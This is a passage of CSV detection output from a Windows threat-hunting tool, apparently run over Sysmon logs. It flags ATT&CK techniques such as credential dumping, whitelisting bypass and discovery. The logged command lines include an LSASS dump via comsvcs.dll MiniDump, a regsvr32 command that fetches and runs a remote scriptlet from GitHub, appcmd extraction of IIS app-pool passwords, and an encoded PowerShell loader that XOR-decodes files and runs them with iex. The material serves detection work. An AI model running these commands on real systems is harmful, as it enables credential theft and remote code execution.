+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 25 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.138 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 25 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.138 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5886 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.230 + 365ABB72-3D6D-5CEB-0000-0010D763FF00 + 3240 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,1601297256.206545,2020-09-28T16:47:36.206545+04:00,,Threat,Critical,Process ( C:\Windows\System32\rdrleakdiag.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 5227 + + + + + Microsoft-Windows-Sysmon/Operational + DESKTOP-PIU87N6 + + + + + + 2020-09-28 12:47:36.204 + BC47D85C-DB68-5F71-0000-0010B237AB01 + 3352 + C:\Windows\System32\rdrleakdiag.exe + BC47D85C-FAA9-5F68-0000-0010D9590000 + 668 + C:\Windows\System32\lsass.exe + 3468 + 0x00007FF8C72C5EC0 + C:\WINDOWS\SYSTEM32\ntdll.dll + + +",DESKTOP-PIU87N6,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.190585,2019-05-27T05:29:17.190585+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5883 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.150 + 365ABB72-3D6D-5CEB-0000-00101760FF00 + 2104 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 24 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 17:00:09.677 + 365ABB72-AD19-5CB8-0000-0010F4F40C00 + 3980 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 24 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-04-18 17:00:09.677 + 365ABB72-AD19-5CB8-0000-0010F4F40C00 + 3980 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + Powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-B0EC-5CD9-0000-0010D9D20000 + 944 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17287 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:19.497 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-B0EC-5CD9-0000-00201D340100 + 0x1341d + 1 + Medium + 